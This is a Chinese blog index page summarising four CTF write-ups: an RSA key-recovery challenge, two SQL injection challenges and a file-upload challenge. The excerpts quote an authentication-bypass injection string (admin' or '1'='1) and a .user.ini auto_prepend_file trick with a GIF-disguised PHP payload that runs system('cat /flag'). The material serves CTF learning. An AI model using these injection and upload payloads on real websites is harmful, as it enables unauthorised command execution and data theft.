摘要:
下载并解压下来压缩包。 然后这个是RSA算法。 我们可以直接用工具RSA Tool2,出私钥d,然后再利用python函数pow()求出flag e = 65537 p = 964842302901051567659055174001042653494573763923573980064398935 阅读全文
posted @ 2020-10-18 16:45
AW_SOLE
阅读(1406)
评论(0)
推荐(0)
摘要:
这或许就是sql最终章了吧 打开页面。 还是这种界面,只不过是加强了一下。哈哈哈。 然后我就还是万能密码admin' or '1' ='1 来了一手 之后的常规注入都是出现了这种页面。有点儿意思喽。 然后我再用联合注入啥的,都不行了,好像是都被过滤掉了。 那我们就得想其他的途径了。百度了一手。学到了 阅读全文
posted @ 2020-10-18 16:20
AW_SOLE
阅读(185)
评论(0)
推荐(0)
摘要:
我们打开环境后发现这还是一道sql注入题 我首先随便试了一下, 先输入了0 显示Error Occured When Fetch Result. 输入1,显示Hello, glzjin wants a girlfriend. 2的话是Do you want to be my girlfriend? 阅读全文
posted @ 2020-10-18 14:46
AW_SOLE
阅读(542)
评论(0)
推荐(0)
摘要:
打开页面,发现是一道上传文件的题 那我们先上传一个.user.ini文件 GIF89a auto_prepend_file=a.jpg 然后再让一传一个a.jpg GIF89a <script language='php'>system('cat /flag')</script> 在这里可以看到 u 阅读全文
posted @ 2020-10-18 12:49
AW_SOLE
阅读(153)
评论(0)
推荐(0)

浙公网安备 33010602011771号